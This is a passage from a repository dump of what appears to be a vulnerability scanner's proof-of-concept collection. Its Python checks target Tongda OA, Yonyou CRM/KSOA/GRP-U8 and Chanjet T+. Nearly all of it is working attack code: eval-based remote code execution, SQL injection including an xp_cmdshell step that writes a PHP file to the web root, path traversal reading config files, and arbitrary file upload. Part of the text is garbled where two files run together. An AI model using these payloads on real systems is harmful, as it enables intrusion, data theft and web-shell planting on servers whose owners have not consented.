20 | if response.status_code == 200 and Content_length > 1000:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_getdata_rce.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '通达OA v11.9 getdata 任意命令执行漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Accept': '*/*',
12 | 'Accept-Language': 'zh-CN,zh;q=0.9',
13 | 'Cache-Control': 'no-cache',
14 | 'Pragma': 'no-cache'
15 | }
16 | vurl = urllib.parse.urljoin(url, "/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyAxNzEwMTI1MTUyOTEyOw==%22)))%3B/*&id=19&module=Carouselimage")
17 | try:
18 | response = requests.get(vurl, headers=headers, timeout=5)
19 | if response.status_code == 200 and '1710125152912' in response.text:
20 | relsult['vulnerable'] = True
21 | relsult['verify'] = vurl
22 | return relsult
23 |
24 | except:
25 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_oa_qyapp-vote-submit_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re, urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '通达OA sqli-布尔盲注(/mobile/api/qyapp.vote.submit.php)',
7 | 'vulnerable': False,
8 | 'url': url,
9 | 'method': 'post',
10 | 'position': 'data',
11 | 'param': 'submitData',
12 | }
13 | timeout = 3
14 | headers = {
15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0',
16 | "Content-Type": "application/x-www-form-urlencoded"
17 | }
18 | payload = '/mobile/api/qyapp.vote.submit.php'
19 | vurl = urllib.parse.urljoin(url, payload)
20 | sqli_data_true = 'submitData={"a":{"vote_type":"1","vote_id":"if((select 995=995),1,2*1e308)","value":"1"}}'
21 | sqli_data_false = 'submitData={"a":{"vote_type":"1","vote_id":"if((select 3353=14451),1,2*1e308)","value":"1"}}'
22 | try:
23 | rep1 = requests.get(vurl, timeout=timeout, verify=False)
24 | if rep1.status_code == 200:
25 | true_rep = requests.post(vurl, headers=headers, data=sqli_data_true, timeout=timeout, verify=False)
26 | false_rep = requests.post(vurl, headers=headers, data=sqli_data_false, timeout=timeout, verify=False)
27 | if len(false_rep.text) > len(true_rep.text) and re.search("请联系管理员", false_rep.text):
28 | relsult['vulnerable'] = True
29 | relsult['vurl'] = vurl
30 | relsult['payload'] = sqli_data_true
31 | return relsult
32 | except:
33 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_sqli_getdata_php.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re, urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '通达OA sql注入(/general/reportshop/utils/get_datas.php)',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | timeout = 3
11 | payload = r'''?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\re%201={`\=%27`%201}%20un\ion%20(s\elect%20uid,sid%20fr\om%20user_online%20whe\re%201\={`=`%201})--%20%27'''
12 | vurl = urllib.parse.urljoin(url, '/general/reportshop/utils/get_datas.php')
13 | vurl2 = urllib.parse.urljoin(url, '/general/reportshop/utils/get_datas.php' + payload)
14 | try:
15 | rep1 = requests.get(vurl, timeout=timeout, verify=False)
16 | if rep1.status_code == 200 and re.search("未指定业务", rep1.text):
17 | rep2 = requests.get(vurl2, timeout=timeout, verify=False)
18 | if rep2.status_code == 200 and re.search("[a-z0-9]{26}", rep2.text):
19 | relsult['vulnerable'] = True
20 | relsult['vurl'] = vurl2
21 | return relsult
22 | except:
23 | return relsult
24 |
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_videofile_fileread.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '通达OA v2017 video_file.php 任意文件下载漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0',
12 | "Content-Type": "application/x-www-form-urlencoded"
13 | }
14 | payload = '/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php'
15 | timeout = 3
16 | vurl = urllib.parse.urljoin(url, payload)
17 | try:
18 | res = requests.get(vurl, headers=headers,timeout=timeout, verify=False)
19 | if res.status_code == 200 and re.search('\$ROOT_PATH=getenv\("DOCUMENT_ROOT"\);', res.text) and re.search('\$ATTACH_PATH=\$ROOT_PATH\."attachment/";', res.text):
20 | relsult['vulnerable'] = True
21 | relsult['vurl'] = vurl
22 | return relsult
23 | else:
24 | return relsult
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_downloadfile_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_downloadfile_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_getemaildata_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_getemaildata_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_help2_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_help2_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_reservationcomplete.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_reservationcomplete.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_swfupload__fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_swfupload__fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_uploadfile_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_uploadfile_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_downloadfile_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Accept-Language': 'zh-CN,zh;q=0.9',
15 | 'Connection': 'close'
16 | }
17 | vurl = urllib.parse.urljoin(url, "/pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini")
18 | try:
19 | response = requests.get(vurl, headers=headers)
20 | if response.status_code == 200 and '[PHP]' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_help2_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友CRM 任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/pub/help2.php?key=../../apache/php.ini")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and 'PHP' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_reservationcomplete.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友CRM系统存在逻辑漏洞直接登录后台',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/background/reservationcomplete.php?ID=1")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200:
18 | response2 = requests.get(url, headers=headers)
19 | if response2.status_code == 200 and '"msg": "bgsesstimeout-", "serverName"' in response2.text:
20 | relsult['vulnerable'] = True
21 | relsult['verify'] = vurl
22 | return relsult
23 |
24 | except:
25 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_reservationcomplete_rce.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞(RCE)',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\helloadmin.php%27;")
15 | try:
16 | response = requests(vurl, headers=headers)
17 | if response.status_code == 200:
18 | rurl = url + '/helloadmin.php'
19 | response = requests.get(rurl)
20 | if response.status_code == 200 and 'hello' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_swfupload__fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友crm-swfupload接口存在任意文件上传漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
13 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
14 | 'Accept-Encoding': 'gzip, deflate',
15 | 'Content-Type': 'multipart/form-data;boundary=----269520967239406871642430066855'
16 | }
17 | data = '''------269520967239406871642430066855
18 | Content-Disposition: form-data; name="file"; filename="s.php "
19 | Content-Type: application/octet-stream
20 |
21 | asdddddd
22 | ------269520967239406871642430066855
23 | Content-Disposition: form-data; name="upload"
24 | upload
25 | ------269520967239406871642430066855--'''
26 | vurl = urllib.parse.urljoin(url, "/ajax/swfupload.php?DontCheckLogin=1&vname=file")
27 | try:
28 | response = requests.post(vurl, headers=headers, data=data)
29 | if response.status_code == 200 and 'tmp.php' in response.text:
30 | relsult['vulnerable'] = True
31 | relsult['verify'] = url + '/tmpfile/***.tmp.php'
32 | return relsult
33 |
34 | except:
35 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PreviewKPQT_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PreviewKPQT_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPFB_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPFB_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPYG_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPYG_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPZP_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPZP_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_QueryService_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_QueryService_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_linkadd_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_linkadd_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_magefield_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_magefield_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ufida_ksoa_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ufida_ksoa_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_PreviewKPQT_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
12 | }
13 | vurl = urllib.parse.urljoin(url, "/kp/PreviewKPQT.jsp?KPQType=KPQT&KPQTID=1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%123456%27)),2,3+--+")
14 | try:
15 | response = requests.get(vurl, headers=headers)
16 | if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
17 | relsult['vulnerable'] = True
18 | relsult['verify'] = vurl
19 | return relsult
20 |
21 | except:
22 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_PrintZPFB_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
12 | }
13 | vurl = urllib.parse.urljoin(url, "/kp/PrintZPFB.jsp?zpfbbh=1%27+union+select+1,2,3,@@VERSION,db_name()+--+")
14 | try:
15 | response = requests.get(vurl, headers=headers)
16 | if response.status_code == 200 and ('1,2' in response.text or 'Microsoft' in response.text):
17 | relsult['vulnerable'] = True
18 | relsult['verify'] = vurl
19 | return relsult
20 |
21 | except:
22 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_PrintZPYG_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
12 | }
13 | vurl = urllib.parse.urljoin(url, "/kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13,14+--+")
14 | try:
15 | response = requests.get(vurl, headers=headers)
16 | if (response.status_code == 200 and '14' in response.text and '13' in response.text) or 'ksoa' in response.text:
17 | relsult['vulnerable'] = True
18 | relsult['verify'] = vurl
19 | return relsult
20 |
21 | except:
22 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_PrintZPZP_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
12 | }
13 | vurl = urllib.parse.urljoin(url, "/kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+--+")
14 | try:
15 | response = requests.get(vurl, headers=headers)
16 | if (response.status_code == 200 and '12' in response.text and '13' in response.text) or 'ksoa' in response.text:
17 | relsult['vulnerable'] = True
18 | relsult['verify'] = vurl
19 | return relsult
20 |
21 | except:
22 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_QueryService_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36',
12 | 'Accept-Encoding': 'gzip, deflate, br',
13 | 'Connection': 'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/com.sksoft.bill.QueryService?service=query&content=SELECT%20HashBytes('md5','123456');")
16 | try:
17 | response = requests.get(vurl, headers=headers)
18 | if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_linkadd_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友时空KSOA-linkadd.jsp存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
12 | 'Accept': '*/*',
13 | 'Connection': 'Keep-Alive'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456%27%29%29%2Cnull%2Cnull%2C%27")
16 | try:
17 | response = requests.get(vurl, headers=headers)
18 | if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_magefield_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友时空KSOA-imagefield接口存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
12 | }
13 | vurl = urllib.parse.urljoin(url, "/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+")
14 | try:
15 | response = requests.get(vurl, headers=headers)
16 | if response.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in response.text:
17 | relsult['vulnerable'] = True
18 | relsult['verify'] = vurl
19 | return relsult
20 |
21 | except:
22 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/__pycache__/yongyou_government_affairs_FileDownload_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/__pycache__/yongyou_government_affairs_FileDownload_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/__pycache__/yongyou_u9_PatchFile_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/__pycache__/yongyou_u9_PatchFile_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_CheckMutex_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_CheckMutex_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_DownloadProxy_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_DownloadProxy_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_Edit_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_Edit_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_InitServerInfo_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_InitServerInfo_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_RRATableController_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_RRATableController_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_create_site_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_create_site_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_login_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_login_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/yongyou_changjietong_CheckMutex_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友畅捷通-TPlus-CheckMutex存在sql注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Accept': '*/*',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0'
15 | }
16 | data = '''{"accNum": "3' AND 5227 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(120)+CHAR(113)))-- NCab", "functionTag": "SYS0104", "url": ""}'''
17 | vurl = urllib.parse.urljoin(url, "/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex")
18 | try:
19 | response = requests.post(vurl, headers=headers, data=data)
20 | if response.status_code == 200 and 'qvpxq' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/yongyou_changjietong_DownloadProxy_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'X-Ajaxpro-Method': 'GetStoreWarehouseByStore',
12 | 'User-Agent': 'Java/1.8.0_381',
13 | 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
14 | 'Connection': 'close'
15 | }
16 | vurl = urllib.parse.urljoin(url, "tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config")
17 | try:
18 | response = requests.get(vurl, headers=headers)
19 | if response.status_code == 200 and '
16 |
17 |
18 |
19 | ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))--
20 |
21 |
22 | '''
23 | vurl = urllib.parse.urljoin(url, "/services/operOriztion")
24 | try:
25 | response = requests.post(vurl, headers=headers, data=data)
26 | if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
27 | relsult['vulnerable'] = True
28 | relsult['verify'] = vurl
29 | return relsult
30 |
31 | except:
32 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/grp-u8/yongyou_grp-u8_proxy_xxe-sqli_2022.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re, time
3 | import urllib, random, string
4 |
5 | def verify(url):
6 | result = {
